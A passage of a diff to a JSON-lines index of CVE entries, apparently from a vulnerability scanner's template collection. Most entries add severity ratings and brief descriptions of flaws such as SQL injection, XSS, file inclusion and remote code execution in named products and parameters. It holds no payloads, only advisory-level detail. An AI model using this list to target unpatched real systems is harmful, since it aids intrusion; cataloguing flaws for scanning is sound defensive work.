parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-8390.yaml"} {"ID":"CVE-2019-8442","Info":{"Name":"Jira - Local File Inclusion","Severity":"high","Description":"Jira before version 7.13.4, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1, allows remote attackers to access files in the Jira webroot under the META-INF directory via local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-8442.yaml"} {"ID":"CVE-2019-8446","Info":{"Name":"Jira Improper Authorization","Severity":"medium","Description":"The /rest/issueNav/1/issueTable resource in Jira before version 8.3.2 allows remote attackers to enumerate usernames via an incorrect authorisation check.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2019/CVE-2019-8446.yaml"} {"ID":"CVE-2019-8449","Info":{"Name":"Jira \u003c8.4.0 - Information Disclosure","Severity":"medium","Description":"Jira before 8.4.0 is susceptible to information disclosure. The /rest/api/latest/groupuserpicker resource can allow an attacker to enumerate usernames, and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2019/CVE-2019-8449.yaml"} @@ -737,6 +791,7 @@ {"ID":"CVE-2020-0618","Info":{"Name":"Microsoft SQL Server Reporting Services - Remote Code Execution","Severity":"high","Description":"Microsoft SQL Server Reporting Services is vulnerable to a remote code execution vulnerability because it incorrectly handles page requests.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2020/CVE-2020-0618.yaml"} {"ID":"CVE-2020-10148","Info":{"Name":"SolarWinds Orion API - Auth Bypass","Severity":"critical","Description":"SolarWinds Orion API is vulnerable to an authentication bypass vulnerability that could allow a remote attacker to execute API commands. This vulnerability could allow a remote attacker to bypass authentication and execute API commands which may result in a compromise of the SolarWinds instance. SolarWinds Orion Platform versions 2019.4 HF 5, 2020.2 with no hotfix installed, and 2020.2 HF 1 are affected.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-10148.yaml"} {"ID":"CVE-2020-10199","Info":{"Name":"Sonatype Nexus Repository Manager 3 - Remote Code Execution","Severity":"high","Description":"Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2020/CVE-2020-10199.yaml"} +{"ID":"CVE-2020-10220","Info":{"Name":"rConfig 3.9 - SQL Injection","Severity":"critical","Description":"An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-10220.yaml"} {"ID":"CVE-2020-10546","Info":{"Name":"rConfig 3.9.4 - SQL Injection","Severity":"critical","Description":"rConfig 3.9.4 and previous versions have unauthenticated compliancepolicies.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-10546.yaml"} {"ID":"CVE-2020-10547","Info":{"Name":"rConfig 3.9.4 - SQL Injection","Severity":"critical","Description":"rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because nodes' passwords are stored by default in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-10547.yaml"} {"ID":"CVE-2020-10548","Info":{"Name":"rConfig 3.9.4 - SQL Injection","Severity":"critical","Description":"rConfig 3.9.4 and previous versions have unauthenticated devices.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-10548.yaml"} @@ -753,6 +808,7 @@ {"ID":"CVE-2020-11547","Info":{"Name":"PRTG Network Monitor \u003c20.1.57.1745 - Information Disclosure","Severity":"medium","Description":"PRTG Network Monitor before 20.1.57.1745 is susceptible to information disclosure. An attacker can obtain information about probes running or the server itself via an HTTP request, thus potentially being able to modify data and/or execute unauthorized administrative operations in the context of the affected site.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2020/CVE-2020-11547.yaml"} {"ID":"CVE-2020-11710","Info":{"Name":"Kong Admin \u003c=2.03 - Admin API Access","Severity":"critical","Description":"Kong Admin through 2.0.3 contains an issue via docker-kong which makes the admin API port accessible on interfaces other than 127.0.0.1.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-11710.yaml"} {"ID":"CVE-2020-11738","Info":{"Name":"WordPress Duplicator 1.3.24 \u0026 1.3.26 - Local File Inclusion","Severity":"high","Description":"WordPress Duplicator 1.3.24 \u0026 1.3.26 are vulnerable to local file inclusion vulnerabilities that could allow attackers to download arbitrary files, such as the wp-config.php file. According to the vendor, the vulnerability was only in two\nversions v1.3.24 and v1.3.26, the vulnerability wasn't\npresent in versions 1.3.22 and before.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-11738.yaml"} +{"ID":"CVE-2020-11798","Info":{"Name":"Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal","Severity":"medium","Description":"A Directory Traversal vulnerability in the web conference component of Mitel MiCollab AWV before 8.1.2.4 and 9.x before 9.1.3 could allow an attacker to access arbitrary files from restricted directories of the server via a crafted URL, due to insufficient access validation. A successful exploit could allow an attacker to access sensitive information from the restricted directories.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2020/CVE-2020-11798.yaml"} {"ID":"CVE-2020-11853","Info":{"Name":"Micro Focus Operations Bridge Manager \u003c=2020.05 - Remote Code Execution","Severity":"high","Description":"Micro Focus Operations Bridge Manager in versions 2020.05 and below is vulnerable to remote code execution via UCMDB. The vulnerability allows remote attackers to execute arbitrary code on affected installations of Data Center Automation. An attack requires network access and authentication as a valid application user. Originated from Metasploit module (#14654).\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2020/CVE-2020-11853.yaml"} {"ID":"CVE-2020-11854","Info":{"Name":"Micro Focus UCMDB - Remote Code Execution","Severity":"critical","Description":"Micro Focus UCMDB is susceptible to remote code execution. Impacted products include Operation Bridge Manager versions 2020.05, 2019.11, 2019.05, 2018.11, 2018.05, 10.63,10.62, 10.61, 10.60, 10.12, 10.11, 10.10 and all earlier versions, and Operations Bridge (containerized) 2020.05, 2019.08, 2019.05, 2018.11, 2018.08, 2018.05. 2018.02 and 2017.11. 3.), and Application Performance Management versions 9,51, 9.50 and 9.40 with UCMDB 10.33 CUP 3.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-11854.yaml"} {"ID":"CVE-2020-11930","Info":{"Name":"WordPress GTranslate \u003c2.8.52 - Cross-Site Scripting","Severity":"medium","Description":"WordPress GTranslate plugin before 2.8.52 contains an unauthenticated reflected cross-site scripting vulnerability via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-11930.yaml"} @@ -761,6 +817,8 @@ {"ID":"CVE-2020-12054","Info":{"Name":"WordPress Catch Breadcrumb \u003c1.5.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Catch Breadcrumb plugin before 1.5.4 contains a reflected cross-site scripting vulnerability via the s parameter (a search query). Also affected are 16 themes if the plugin is enabled: Alchemist and Alchemist PRO, Izabel and Izabel PRO, Chique and Chique PRO, Clean Enterprise and Clean Enterprise PRO, Bold Photography PRO, Intuitive PRO, Devotepress PRO, Clean Blocks PRO, Foodoholic PRO, Catch Mag PRO, Catch Wedding PRO, and Higher Education PRO.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-12054.yaml"} {"ID":"CVE-2020-12116","Info":{"Name":"Zoho ManageEngine OpManger - Arbitrary File Read","Severity":"high","Description":"Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a specially crafted request.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-12116.yaml"} {"ID":"CVE-2020-12127","Info":{"Name":"WAVLINK WN530H4 M30H4.V5030.190403 - Information Disclosure","Severity":"high","Description":"WAVLINK WN530H4 M30H4.V5030.190403 contains an information disclosure vulnerability in the /cgi-bin/ExportAllSettings.sh endpoint. This can allow an attacker to leak router settings, including cleartext login details, DNS settings, and other sensitive information without authentication.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-12127.yaml"} +{"ID":"CVE-2020-12256","Info":{"Name":"rConfig 3.9.4 - Cross-Site Scripting","Severity":"medium","Description":"The rConfig 3.9.4 is vulnerable to cross-site scripting. The devicemgmnt.php file improperly validates the request coming from the user input. Due to this flaw, An attacker can exploit this vulnerability by crafting arbitrary javascript in `deviceId` GET parameter of devicemgmnt.php resulting in execution of the javascript.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2020/CVE-2020-12256.yaml"} +{"ID":"CVE-2020-12259","Info":{"Name":"rConfig 3.9.4 - Cross-Site Scripting","Severity":"medium","Description":"rConfig 3.9.4 is vulnerable to reflected XSS. The configDevice.php file improperly validates user input. An attacker can exploit this vulnerability by crafting arbitrary JavaScript in the rid GET parameter of devicemgmnt.php\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2020/CVE-2020-12259.yaml"} {"ID":"CVE-2020-12447","Info":{"Name":"Onkyo TX-NR585 Web Interface - Directory Traversal","Severity":"high","Description":"Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal and local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-12447.yaml"} {"ID":"CVE-2020-12478","Info":{"Name":"TeamPass 2.1.27.36 - Improper Authentication","Severity":"high","Description":"TeamPass 2.1.27.36 is susceptible to improper authentication. An attacker can retrieve files from the TeamPass web root, which may include backups or LDAP debug files, and therefore possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-12478.yaml"} {"ID":"CVE-2020-12720","Info":{"Name":"vBulletin SQL Injection","Severity":"critical","Description":"vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control that permits SQL injection attacks.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-12720.yaml"} @@ -773,8 +831,10 @@ {"ID":"CVE-2020-13379","Info":{"Name":"Grafana 3.0.1-7.0.1 - Server-Side Request Forgery","Severity":"high","Description":"Grafana 3.0.1 through 7.0.1 is susceptible to server-side request forgery via the avatar feature, which can lead to remote code execution. Any unauthenticated user/client can make Grafana send HTTP requests to any URL and return its result. This can be used to gain information about the network Grafana is running on, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2020/CVE-2020-13379.yaml"} {"ID":"CVE-2020-13405","Info":{"Name":"Microweber \u003c1.1.20 - Information Disclosure","Severity":"high","Description":"Microweber before 1.1.20 is susceptible to information disclosure via userfiles/modules/users/controller/controller.php. An attacker can disclose the users database via a /modules/ POST request and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-13405.yaml"} {"ID":"CVE-2020-13483","Info":{"Name":"Bitrix24 \u003c=20.0.0 - Cross-Site Scripting","Severity":"medium","Description":"The Web Application Firewall in Bitrix24 up to and including 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-13483.yaml"} +{"ID":"CVE-2020-13638","Info":{"Name":"rConfig 3.9 - Authentication Bypass(Admin Login)","Severity":"critical","Description":"lib/crud/userprocess.php in rConfig 3.9.x before 3.9.7 has an authentication bypass, leading to administrator account creation. This issue has been fixed in 3.9.7.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-13638.yaml"} {"ID":"CVE-2020-13700","Info":{"Name":"WordPresss acf-to-rest-api \u003c=3.1.0 - Insecure Direct Object Reference","Severity":"high","Description":"WordPresss acf-to-rest-ap through 3.1.0 allows an insecure direct object reference via permalinks manipulation, as demonstrated by a wp-json/acf/v3/options/ request that can read sensitive information in the wp_options table such as the login and pass values.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-13700.yaml"} {"ID":"CVE-2020-13820","Info":{"Name":"Extreme Management Center 8.4.1.24 - Cross-Site Scripting","Severity":"medium","Description":"Extreme Management Center 8.4.1.24 contains a cross-site scripting vulnerability via a parameter in a GET request. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-13820.yaml"} +{"ID":"CVE-2020-13851","Info":{"Name":"Artica Pandora FMS 7.44 - Remote Code Execution","Severity":"high","Description":"Artica Pandora FMS 7.44 allows remote command execution via the events feature.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2020/CVE-2020-13851.yaml"} {"ID":"CVE-2020-13927","Info":{"Name":"Airflow Experimental \u003c1.10.11 - REST API Auth Bypass","Severity":"critical","Description":"Airflow's Experimental API prior 1.10.11 allows all API requests without authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-13927.yaml"} {"ID":"CVE-2020-13937","Info":{"Name":"Apache Kylin - Exposed Configuration File","Severity":"medium","Description":"Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2020/CVE-2020-13937.yaml"} {"ID":"CVE-2020-13942","Info":{"Name":"Apache Unomi \u003c1.5.2 - Remote Code Execution","Severity":"critical","Description":"Apache Unomi allows conditions to use OGNL and MVEL scripting which\noffers the possibility to call static Java classes from the JDK\nthat could execute code with the permission level of the running Java process.\nThis vulnerability affects all versions of Apache Unomi prior to 1.5.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-13942.yaml"} @@ -805,6 +865,7 @@ {"ID":"CVE-2020-17362","Info":{"Name":"Nova Lite \u003c 1.3.9 - Cross-Site Scripting","Severity":"medium","Description":"Nova Lite before 1.3.9 for WordPress is susceptible to reflected cross-site scripting via search.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-17362.yaml"} {"ID":"CVE-2020-17453","Info":{"Name":"WSO2 Carbon Management Console \u003c=5.10 - Cross-Site Scripting","Severity":"medium","Description":"WSO2 Management Console through 5.10 is susceptible to reflected cross-site scripting which can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-17453.yaml"} {"ID":"CVE-2020-17456","Info":{"Name":"SEOWON INTECH SLC-130 \u0026 SLR-120S - Unauthenticated Remote Code Execution","Severity":"critical","Description":"SEOWON INTECH SLC-130 and SLR-120S devices allow remote code execution via the ipAddr parameter to the system_log.cgi page.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-17456.yaml"} +{"ID":"CVE-2020-17463","Info":{"Name":"Fuel CMS 1.4.7 - SQL Injection","Severity":"critical","Description":"FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-17463.yaml"} {"ID":"CVE-2020-17496","Info":{"Name":"vBulletin 5.5.4 - 5.6.2- Remote Command Execution","Severity":"critical","Description":"vBulletin versions 5.5.4 through 5.6.2 allow remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-17496.yaml"} {"ID":"CVE-2020-17505","Info":{"Name":"Artica Web Proxy 4.30 - OS Command Injection","Severity":"high","Description":"Artica Web Proxy 4.30 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2020/CVE-2020-17505.yaml"} {"ID":"CVE-2020-17506","Info":{"Name":"Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection","Severity":"critical","Description":"Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-17506.yaml"} @@ -818,6 +879,7 @@ {"ID":"CVE-2020-19295","Info":{"Name":"Jeesns 1.4.2 - Cross-Site Scripting","Severity":"medium","Description":"Jeesns 1.4.2 is vulnerable to reflected cross-site scripting in the /weibo/topic component and allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-19295.yaml"} {"ID":"CVE-2020-19360","Info":{"Name":"FHEM 6.0 - Local File Inclusion","Severity":"high","Description":"FHEM version 6.0 suffers from a local file inclusion vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-19360.yaml"} {"ID":"CVE-2020-1943","Info":{"Name":"Apache OFBiz \u003c=16.11.07 - Cross-Site Scripting","Severity":"medium","Description":"Apache OFBiz 16.11.01 to 16.11.07 is vulnerable to cross-site scripting because data sent with contentId to /control/stream is not sanitized.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-1943.yaml"} +{"ID":"CVE-2020-19515","Info":{"Name":"qdPM 9.1 - Cross-site Scripting","Severity":"medium","Description":"qdPM V9.1 is vulnerable to Cross Site Scripting (XSS) via qdPM\\install\\modules\\database_config.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-19515.yaml"} {"ID":"CVE-2020-1956","Info":{"Name":"Apache Kylin 3.0.1 - Command Injection Vulnerability","Severity":"high","Description":"Apache Kylin 2.3.0, and releases up to 2.6.5 and 3.0.1 has some restful apis which will concatenate os command with the user input string, a user is likely to be able to execute any os command without any protection or validation.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2020/CVE-2020-1956.yaml"} {"ID":"CVE-2020-19625","Info":{"Name":"Gridx 1.3 - Remote Code Execution","Severity":"critical","Description":"Gridx 1.3 is susceptible to remote code execution via tests/support/stores/test_grid_filter.php, which allows remote attackers to execute arbitrary code via crafted values submitted to the $query parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-19625.yaml"} {"ID":"CVE-2020-20285","Info":{"Name":"ZZcms - Cross-Site Scripting","Severity":"medium","Description":"ZZcms 2019 contains a cross-site scripting vulnerability in the user login page. An attacker can inject arbitrary JavaScript code in the referer header via user/login.php, which can allow theft of cookie-based credentials and launch of subsequent attacks.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2020/CVE-2020-20285.yaml"} @@ -876,11 +938,12 @@ {"ID":"CVE-2020-2733","Info":{"Name":"JD Edwards EnterpriseOne Tools 9.2 - Information Disclosure","Severity":"critical","Description":"JD Edwards EnterpriseOne Tools 9.2 is susceptible to information disclosure via the Monitoring and Diagnostics component. An attacker with network access via HTTP can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-2733.yaml"} {"ID":"CVE-2020-27361","Info":{"Name":"Akkadian Provisioning Manager 4.50.02 - Sensitive Information Disclosure","Severity":"high","Description":"Akkadian Provisioning Manager 4.50.02 could allow viewing of sensitive information within the /pme subdirectories.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-27361.yaml"} {"ID":"CVE-2020-27467","Info":{"Name":"Processwire CMS \u003c2.7.1 - Local File Inclusion","Severity":"high","Description":"Processwire CMS prior to 2.7.1 is vulnerable to local file inclusion because it allows a remote attacker to retrieve sensitive files via the download parameter to index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-27467.yaml"} -{"ID":"CVE-2020-27481","Info":{"Name":"Good Layers LMS Plugin \u003c= 2.1.4 - SQL Injection","Severity":"critical","Description":"An unauthenticated SQL Injection vulnerability in Good Layers LMS Plugin \u003c= 2.1.4 exists due to the usage of \"wp_ajax_nopriv\" call in WordPress, which allows any unauthenticated user to get access to the function \"gdlr_lms_cancel_booking\" where POST Parameter \"id\" was sent straight into SQL query without sanitization.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2020/CVE-2020-27481.yaml"} +{"ID":"CVE-2020-27481","Info":{"Name":"Good Layers LMS Plugin \u003c= 2.1.4 - SQL Injection","Severity":"critical","Description":"An unauthenticated SQL Injection vulnerability in Good Layers LMS Plugin \u003c= 2.1.4 exists due to the usage of \"wp_ajax_nopriv\" call in WordPress, which allows any unauthenticated user to get access to the function \"gdlr_lms_cancel_booking\" where POST Parameter \"id\" was sent straight into SQL query without sanitization.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-27481.yaml"} {"ID":"CVE-2020-27735","Info":{"Name":"Wing FTP 6.4.4 - Cross-Site Scripting","Severity":"medium","Description":"Wing FTP 6.4.4 is vulnerable to cross-site scripting via its web interface because an arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-27735.yaml"} {"ID":"CVE-2020-27866","Info":{"Name":"NETGEAR - Authentication Bypass","Severity":"high","Description":"NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers are vulnerable to authentication bypass vulnerabilities which could allow network-adjacent attackers to bypass authentication on affected installations.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2020/CVE-2020-27866.yaml"} {"ID":"CVE-2020-27982","Info":{"Name":"IceWarp WebMail 11.4.5.0 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp WebMail 11.4.5.0 is vulnerable to cross-site scripting via the language parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-27982.yaml"} {"ID":"CVE-2020-27986","Info":{"Name":"SonarQube - Authentication Bypass","Severity":"high","Description":"SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,\nSVN, and GitLab credentials via the api/settings/values URI.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-27986.yaml"} +{"ID":"CVE-2020-28185","Info":{"Name":"TerraMaster TOS \u003c 4.2.06 - User Enumeration","Severity":"medium","Description":"User Enumeration vulnerability in TerraMaster TOS \u003c= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2020/CVE-2020-28185.yaml"} {"ID":"CVE-2020-28188","Info":{"Name":"TerraMaster TOS - Unauthenticated Remote Command Execution","Severity":"critical","Description":"TerraMaster TOS \u003c= 4.2.06 is susceptible to a remote code execution vulnerability which could allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php via the Event parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-28188.yaml"} {"ID":"CVE-2020-28208","Info":{"Name":"Rocket.Chat \u003c3.9.1 - Information Disclosure","Severity":"medium","Description":"Rocket.Chat through 3.9.1 is susceptible to information disclosure. An attacker can enumerate email addresses via the password reset function and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2020/CVE-2020-28208.yaml"} {"ID":"CVE-2020-28351","Info":{"Name":"Mitel ShoreTel 19.46.1802.0 Devices - Cross-Site Scripting","Severity":"medium","Description":"Mitel ShoreTel 19.46.1802.0 devices and their conference component are vulnerable to an unauthenticated attacker conducting reflected cross-site scripting attacks via the PATH_INFO variable to index.php due to insufficient validation for the time_zone object in the HOME_MEETING\u0026 page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-28351.yaml"} @@ -911,6 +974,10 @@ {"ID":"CVE-2020-35847","Info":{"Name":"Agentejo Cockpit \u003c0.11.2 - NoSQL Injection","Severity":"critical","Description":"Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-35847.yaml"} {"ID":"CVE-2020-35848","Info":{"Name":"Agentejo Cockpit \u003c0.12.0 - NoSQL Injection","Severity":"critical","Description":"Agentejo Cockpit prior to 0.12.0 is vulnerable to NoSQL Injection via the newpassword method of the Auth controller, which is responsible for displaying the user password reset form.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-35848.yaml"} {"ID":"CVE-2020-35951","Info":{"Name":"Wordpress Quiz and Survey Master \u003c7.0.1 - Arbitrary File Deletion","Severity":"critical","Description":"Wordpress Quiz and Survey Master \u003c7.0.1 allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files).","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2020/CVE-2020-35951.yaml"} +{"ID":"CVE-2020-35984","Info":{"Name":"Rukovoditel \u003c= 2.7.2 - Cross Site Scripting","Severity":"medium","Description":"A stored cross site scripting (XSS) vulnerability in the 'Users Alerts' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Title' parameter.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2020/CVE-2020-35984.yaml"} +{"ID":"CVE-2020-35985","Info":{"Name":"Rukovoditel \u003c= 2.7.2 - Cross Site Scripting","Severity":"medium","Description":"A stored cross site scripting (XSS) vulnerability in the 'Global Lists\" feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2020/CVE-2020-35985.yaml"} +{"ID":"CVE-2020-35986","Info":{"Name":"Rukovoditel \u003c= 2.7.2 - Cross Site Scripting","Severity":"medium","Description":"A stored cross site scripting (XSS) vulnerability in the 'Users Access Groups' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2020/CVE-2020-35986.yaml"} +{"ID":"CVE-2020-35987","Info":{"Name":"Rukovoditel \u003c= 2.7.2 - Cross-Site Scripting","Severity":"medium","Description":"A stored cross site scripting (XSS) vulnerability in the 'Entities List' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2020/CVE-2020-35987.yaml"} {"ID":"CVE-2020-36112","Info":{"Name":"CSE Bookstore 1.0 - SQL Injection","Severity":"critical","Description":"CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-36112.yaml"} {"ID":"CVE-2020-36289","Info":{"Name":"Jira Server and Data Center - Information Disclosure","Severity":"medium","Description":"Jira Server and Data Center is susceptible to information disclosure. An attacker can enumerate users via the QueryComponentRendererValue!Default.jspa endpoint and thus potentially access sensitive information, modify data, and/or execute unauthorized operations, Affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2020/CVE-2020-36289.yaml"} {"ID":"CVE-2020-36365","Info":{"Name":"Smartstore \u003c4.1.0 - Open Redirect","Severity":"medium","Description":"Smartstore (aka \"SmartStoreNET\") before 4.1.0 contains an open redirect vulnerability via CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-36365.yaml"} @@ -933,6 +1000,7 @@ {"ID":"CVE-2020-6287","Info":{"Name":"SAP NetWeaver AS JAVA 7.30-7.50 - Remote Admin Addition","Severity":"critical","Description":"SAP NetWeaver AS JAVA (LM Configuration Wizard), versions 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration 